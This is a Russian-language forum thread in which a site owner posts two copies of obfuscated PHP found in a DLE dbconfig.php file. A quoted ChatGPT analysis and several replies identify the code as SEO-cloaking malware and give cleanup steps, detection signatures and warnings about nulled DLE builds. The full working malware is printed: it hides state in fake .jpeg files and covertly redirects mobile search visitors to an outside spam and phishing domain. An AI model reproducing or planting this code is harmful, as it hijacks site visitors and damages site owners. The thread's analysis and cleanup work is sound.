Вопрос? Заражён в конфигурации dbconfig.php

TacTics

Спойлер: Первая часть

Код:

if(!defined('SORRYCHIEF')){define('SORRYCHIEF',true);$zz_0='080825';$zz_1='11';$zz_2=$_SERVER['DOCUMENT_ROOT'];if(@is_dir($zz_2 .'/uploads/posts/')){$zz_3=$zz_2 .'/uploads/posts/';}elseif(@is_dir($zz_2 .'/wp-includes/')){$zz_3=$zz_2 .'/wp-includes/';}elseif(@is_dir($zz_2 .'/cache/')){$zz_3=$zz_2 .'/cache/';}elseif(@is_dir($zz_2 .'/system/library/')){$zz_3=$zz_2 .'/system/library/';}elseif(@is_dir($zz_2 .'/includes/database/')){$zz_3=$zz_2 .'/includes/database/';}elseif(@is_dir($zz_2 .'/bitrix/modules/')){$zz_3=$zz_2 .'/bitrix/modules/';}$zz_4=$zz_3 ."stats.jpeg";$zz_5=$zz_3 ."timer.jpeg";$zz_6=$zz_3 ."watermark.jpeg";$zz_7='__' .'us' .'er_' .'i' .'d_';$zz_8=$zz_7 .'1';$zz_9=$zz_7 .'2';$zz_10=$zz_7 .'3';$zz_11=$zz_7 .'4';$zz_12=$zz_7 .'5';$zz_13='__' .'us' .'er_' .'i' .'ds_';$zz_14=@$_SERVER;$zz_15=@$zz_14['REQU' .'EST_URI'];$zz_16=@$zz_14['HT' .'TP_USE' .'R_AGENT'];$zz_17=@$zz_14['HTT' .'P_HO' .'ST'];$zz_18=@$zz_14['HT' .'TP_REF' .'ERER'];if((!$zz_16)or($zz_16=='')or(@!preg_match('/baidu|ia_arch|oogle|igma|Bot|andex|amble|W3C_|YaBrow|bot|pider|EltaIn|curl|ahoo|rawle|Wget|mail./i',$zz_16))){if(@preg_match('/andex.|pinter|sogou|shenma|instag|yahoo.|msn.c|utube|witter|ok.ru|vk.co|ulog|facebo.|odnok|ut.by|baidu|mail.r|search|smi2|igma|ambler|oogle.|duckduck|naver|aol.c|rbc.|bing./i',$zz_18)){if((@preg_match('/p.browser|ndroid|midp|ymbian|htc_|mini|symbos|obile|j2me|eries\ 60|phone/i',$zz_16))and(@!isset($_COOKIE['dle_user_id']))and(@!preg_match('/=addnews|admin.php|=logout|=register|=feedback|login.php|administration/i',$zz_15))and($zz_15 != '/')){@$zz_19="1";}}}if((@file_exists($zz_6))&(@filesize($zz_6)>1)&(@isset($_COOKIE[$zz_13]))&(@!isset($_COOKIE[$zz_7]))){@setcookie($zz_7,'79214477',time()+83911,'/');if(@!file_exists($zz_5)){@file_put_contents($zz_5,time()+85000);@file_put_contents($zz_4,"1");}$zz_20=@file_get_contents($zz_5);if($zz_20>@time()){$zz_21=@fopen($zz_4,"a+");@flock($zz_21,LOCK_EX);$zz_22=@fread($zz_21,@filesize($zz_4));@$zz_22++;@ftruncate($zz_21,0);@fwrite($zz_21,$zz_22);@fflush($zz_21);@flock($zz_21,LOCK_UN);@fclose($zz_21);}else{@unlink($zz_5);@unlink($zz_4);@file_put_contents($zz_6,"");}if(@file_exists($zz_4)){$zz_22=@file_get_contents($zz_4);if($zz_22>$zz_1){@unlink($zz_5);@unlink($zz_4);@unlink($zz_6);}}}if((@file_exists($zz_6))&(@filesize($zz_6)>1)&(@$zz_19 == "1")&(!isset($_COOKIE[$zz_13]))){@setcookie($zz_13,'79214477',time()+83911,'/');}if(@!file_exists($zz_6)&(@!isset($_COOKIE[$zz_12]))){$zz_23=@$_COOKIE[$zz_7];if(@isset($_COOKIE[$zz_10])){@setcookie($zz_11,'4',time()+83911,'/');}if(@isset($_COOKIE[$zz_9])){@setcookie($zz_10,'3',time()+83911,'/');}if(@isset($_COOKIE[$zz_8])){@setcookie($zz_9,'2',time()+83911,'/');}if(@isset($_COOKIE[$zz_7])){@setcookie($zz_8,'1',time()+83911,'/');}if((@isset($_COOKIE[$zz_24]))or(@isset($_COOKIE[$zz_9]))or(@isset($_COOKIE[$zz_10]))or(@isset($_COOKIE[$zz_11]))){@setcookie($zz_12,'954',@time()+85119,'/');@header(@strrev('3?ig' .'c.n' .'iw' .'/pame' .'tis/sk' .'ce' .'hc/cc' .'.s' .'pam-e' .'tis/' .'/:sp' .'tth :n' .'oita' .'coL') .'&seor' .'ef=' .rawurlencode($zz_18) .'parameter=\$keyword&se=\$se&ur=1' .strrev(strtoupper('=rerefer_ptth&')) .rawurlencode('http://' .$zz_17 .$zz_15));exit;}if((!isset($_COOKIE[$zz_7]))&(@$zz_19 == "1")){@setcookie($zz_7,'0',time()+83911,'/');}}}

Спойлер: Вторая часть

Код:

if(!defined('SORRYCHIEF')){define('SORRYCHIEF',true);$mm_0='210225';$mm_1='25';$mm_2=$_SERVER['DOCUMENT_ROOT'];if(@is_dir($mm_2 .'/uploads/posts/')){$mm_3=$mm_2 .'/uploads/posts/';}elseif(@is_dir($mm_2 .'/wp-includes/')){$mm_3=$mm_2 .'/wp-includes/';}elseif(@is_dir($mm_2 .'/cache/')){$mm_3=$mm_2 .'/cache/';}elseif(@is_dir($mm_2 .'/system/library/')){$mm_3=$mm_2 .'/system/library/';}elseif(@is_dir($mm_2 .'/includes/database/')){$mm_3=$mm_2 .'/includes/database/';}elseif(@is_dir($mm_2 .'/bitrix/modules/')){$mm_3=$mm_2 .'/bitrix/modules/';}$mm_4=$mm_3 ."stats.jpeg";$mm_5=$mm_3 ."timer.jpeg";$mm_6=$mm_3 ."watermark.jpeg";$mm_7='__' .'us' .'er_' .'i' .'d_';$mm_8=$mm_7 .'1';$mm_9=$mm_7 .'2';$mm_10=$mm_7 .'3';$mm_11=$mm_7 .'4';$mm_12=$mm_7 .'5';$mm_13='__' .'us' .'er_' .'i' .'ds_';$mm_14=@$_SERVER;$mm_15=@$mm_14['REQU' .'EST_URI'];$mm_16=@$mm_14['HT' .'TP_USE' .'R_AGENT'];$mm_17=@$mm_14['HTT' .'P_HO' .'ST'];$mm_18=@$mm_14['HT' .'TP_REF' .'ERER'];if((!$mm_16)or($mm_16=='')or(@!preg_match('/baidu|ia_arch|oogle|igma|Bot|andex|amble|W3C_|YaBrow|bot|pider|EltaIn|curl|ahoo|rawle|Wget|mail./i',$mm_16))){if(@preg_match('/andex.|pinter|sogou|shenma|instag|yahoo.|msn.c|utube|witter|ok.ru|vk.co|ulog|facebo.|odnok|ut.by|baidu|mail.r|search|smi2|igma|ambler|oogle.|duckduck|naver|aol.c|rbc.|bing./i',$mm_18)){if((@preg_match('/p.browser|ndroid|midp|ymbian|htc_|mini|symbos|obile|j2me|eries\ 60|phone/i',$mm_16))and(@!isset($_COOKIE['dle_user_id']))and(@!preg_match('/=addnews|admin.php|=logout|=register|=feedback|login.php|administration/i',$mm_15))and($mm_15 != '/')){@$mm_19="1";}}}if((@file_exists($mm_6))&(@filesize($mm_6)>1)&(@isset($_COOKIE[$mm_13]))&(@!isset($_COOKIE[$mm_7]))){@setcookie($mm_7,'79214477',time()+82214,'/');if(@!file_exists($mm_5)){@file_put_contents($mm_5,time()+85000);@file_put_contents($mm_4,"1");}$mm_20=@file_get_contents($mm_5);if($mm_20>@time()){$mm_21=@fopen($mm_4,"a+");@flock($mm_21,LOCK_EX);$mm_22=@fread($mm_21,@filesize($mm_4));@$mm_22++;@ftruncate($mm_21,0);@fwrite($mm_21,$mm_22);@fflush($mm_21);@flock($mm_21,LOCK_UN);@fclose($mm_21);}else{@unlink($mm_5);@unlink($mm_4);@file_put_contents($mm_6,"");}if(@file_exists($mm_4)){$mm_22=@file_get_contents($mm_4);if($mm_22>$mm_1){@unlink($mm_5);@unlink($mm_4);@unlink($mm_6);}}}if((@file_exists($mm_6))&(@filesize($mm_6)>1)&(@$mm_19 == "1")&(!isset($_COOKIE[$mm_13]))){@setcookie($mm_13,'79214477',time()+82214,'/');}if(@!file_exists($mm_6)&(@!isset($_COOKIE[$mm_12]))){$mm_23=@$_COOKIE[$mm_7];if(@isset($_COOKIE[$mm_10])){@setcookie($mm_11,'4',time()+82214,'/');}if(@isset($_COOKIE[$mm_9])){@setcookie($mm_10,'3',time()+82214,'/');}if(@isset($_COOKIE[$mm_8])){@setcookie($mm_9,'2',time()+82214,'/');}if(@isset($_COOKIE[$mm_7])){@setcookie($mm_8,'1',time()+82214,'/');}if((@isset($_COOKIE[$mm_24]))or(@isset($_COOKIE[$mm_9]))or(@isset($_COOKIE[$mm_10]))or(@isset($_COOKIE[$mm_11]))){@setcookie($mm_12,'954',@time()+85114,'/');@header(@strrev('3?ig' .'c.n' .'iw' .'/pame' .'tis/sk' .'ce' .'hc/cc' .'.s' .'pam-e' .'tis/' .'/:sp' .'tth :n' .'oita' .'coL') .'&seor' .'ef=' .rawurlencode($mm_18) .'parameter=\$keyword&se=\$se&ur=1' .strrev(strtoupper('=rerefer_ptth&')) .rawurlencode('http://' .$mm_17 .$mm_15));exit;}if((!isset($_COOKIE[$mm_7]))&(@$mm_19 == "1")){@setcookie($mm_7,'0',time()+82214,'/');}}}

 

Вот ChatGPT:

Спойлер: Про код

Код:

Это вредоносный SEO-вирус (SEO-cloaking / redirect / doorway), очень распространённый на сайтах DLE, WordPress, Bitrix и т.д.

Коротко: он незаметно перенаправляет мобильных посетителей из поисковиков на сторонние спам-сайты и живёт за счёт cookies и скрытых файлов.

Что именно это за вирус

Это SEO-редирект под мобильный трафик с поисковых систем:

Определяет CMS (DLE, WP, Bitrix и др.)

Проверяет User-Agent (мобильные браузеры)

Проверяет Referer (Google, Yandex, Bing, Yahoo, Mail.ru и т.п.)

Игнорирует ботов

Работает только для гостей, не для админов

После этого:
➡️ делает скрытый 302-редирект на спам-домен вида
hxxp://ccheck/stitemap/...

Почему он такой «странный»
Маскировка:

Файлы называются как картинки:

stats.jpeg
timer.jpeg
watermark.jpeg


но это не картинки, а служебные файлы вируса

Cookies:

__user_id_1

__user_id_2

__user_ids_

и т.д.

Нужны, чтобы:

не редиректить пользователя каждый раз

не палиться поисковым ботам

дозировать трафик (лимит $zz_1 = 11)

Что он делает по шагам

Ищет папку CMS:

/uploads/posts/
/wp-includes/
/bitrix/modules/
/system/library/


Создаёт служебные файлы:

watermark.jpeg  ← флаг активности
timer.jpeg      ← таймер жизни
stats.jpeg      ← счётчик переходов


Проверяет:

мобильный ли пользователь

пришёл ли из поисковика

не залогинен ли

Делает редирект на спам-сайт

Ставит cookies, чтобы:

повторно не редиректить

обходить анти-вирусы

Опасен ли он?

Да. Очень.

Последствия:

❌ бан сайта в Google / Яндексе

❌ «Вредоносное ПО» в Search Console

❌ падение позиций

❌ утечка трафика

❌ возможная подгрузка JS-вирусов дальше

Где он обычно находится

Чаще всего:

index.php

engine/init.php (DLE)

engine/engine.php

wp-config.php

header.php

functions.php

файлы шаблона .tpl

Иногда вставлен в базу:

шаблоны

новости

баннеры

Что делать СРОЧНО
1️⃣ Удалить код

Полностью. Без «комментирования».

2️⃣ Удалить файлы

Во всех папках сайта ищи и удаляй:

stats.jpeg
timer.jpeg
watermark.jpeg

3️⃣ Проверить весь сайт

По сигнатурам:

__user_id_
watermark.jpeg
stats.jpeg
strrev(
rawurlencode(
HTTP_REFERER

4️⃣ Сменить ВСЕ пароли

FTP / SFTP

SSH

MySQL

админку CMS

5️⃣ Проверить cron

Часто вирус самовосстанавливается.

 

TacTics вкратце кто-то зарабатывает на твоем сайте, это два кусок кода перенаправляет пользователей на https://site-maps.cc/checks/sitemap/win.cgi?3
причем перенаправляет на всякие казино, фишинг и всякую фигню

 

TacTics для начало сделай бэкап а потом удали этот код и погляди

 

Часто с подобным сталкивался когда доступ к сайту давал разным недобросовестным кодерам. Но обычно они скрытый майнинг ставили.
Вспоминай кому давал доступы к сайту. Если нет тогда не знаю как появилась у тебя эта дичь. У меня чисто на счет этого.
Если сохранилась ДЛЕ которую скачивал, глянь там, если есть, кинь ссыль на тему, что бы форумчани знали, кому не стоит доверять, и не скачивали его файлы.

 

Ну я смотрю время идёт, а бэкдоры всё те же. Помню запустил свой первый муз сайт в 2009 на DLE Nulled на каком-то шаблоне, наполнял его каждый день, даже были какие-то юзеры и я успел рекламу установить от какой-то древней рекламной сети, а мне его сломали через несколько недель. Как же я тогда расстроился это просто ппц, и всё не мог понять что за сцукины дети это сделали

 

Скачал крякнутый dle с сайта dleshka.org 100%, у них там ещё шелы зашиты к примеру в папке ajax есть файл redis.php с таким содержанием, там же ещё может быть js.php подобный код содержится.

 

ТС, ты просто клоун в моих глазах. За свой сервак ты отваливаешь сотни баксов в месяц хостеру за аренду, покупаешь шаблоны и плагины для DLE у разрабов. А купить пару чистых лицензий DLE у разраба движка тебе, что, религия не позволяет? Ну, продолжай упорствовать в своей тупости и дальше, мне-то пофиг на твои сайты. Мне как-то раз подсунул такой вирус хостер, на мои письма отказывался отвечать, пришлось вычищать все самому и переезжать на другие сервера. В другой раз вирус лез на мои WordPress сайты через бесплатный скрипт и пока я не снес этот скрипт, через бэк дор он продолжал совать свои вирусы, сколько бы я их не вычищал. Делай выводы, если есть чем, короче

 

Skyworker а ты клоун который не читает Вопрос? - Заражён в конфигурации dbconfig.php